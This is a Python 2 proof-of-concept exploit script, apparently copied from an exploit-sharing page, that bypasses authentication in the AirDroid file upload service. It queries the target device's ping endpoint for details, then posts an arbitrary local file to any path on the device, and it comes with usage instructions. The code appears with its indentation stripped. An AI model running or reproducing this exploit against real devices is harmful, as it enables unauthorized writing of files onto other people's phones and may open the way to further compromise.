扫码分享
验证:
体验盒子#/IN THE NAME OF GOD
#/auth====PARSA ADIB
import sys,requests,re,urllib2
def logo():
print"\t\t .__ .___ .__.___"
print"\t\t_____|__|________| _/__________ |__| __| _/"
print"\t\t\__\ |\___ \/ __ |\___ \/_ \||/ __ | "
print"\t\t / __ \|||| \/ /_/ | || \(<_> )/ /_/ | "
print"\t\t(____/__||__|\____ | |__| \____/|__\____ | "
print"\t\t \/ \/\/ "
print "\t\tAIRDROID VerAll UPLOAD AUTH BYPASS PoC @ Parsa Adib"
if len(sys.argv)<6 or len(sys.argv)>6 :
logo()
print "\t\tUSAGE:python exploit.py ip port remote-file-name local-file-name remote-file-path"
print "\t\tEXAMPLE:python exploit.py 192.168.1.2 8888 poc poc.txt /sdcard"
else :
logo()
print "\n[+]Reciving Details\n-----------------------------"
try :
p = requests.get('http://'+sys.argv[1]+':'+sys.argv[2]+'/sdctl/comm/ping/')
except IOError :
print "\n[!] Check If server is Running"
sys.exit()
for i in p.content.split(',') :
for char in '{"}_':
i = i.replace(char,'').upper()
print "[*]"+i+""
print "\n[+]Sending File\n-----------------------------"
try :
r = requests.post('http://'+sys.argv[1]+':'+sys.argv[2]+'/sdctl/comm/upload/dir?fn='+sys.argv[3]+'&d='+sys.argv[5]+'&after=1&fname='+sys.argv[3], files={sys.argv[4]: open(sys.argv[4], 'rb').read()})
if (r.status_code == 200) :
print "[*]RESPONSE:200"
print "[*]FILE SENT SUCCESSFULY"
except IOError :
print "\n[!] Error"
体验盒子
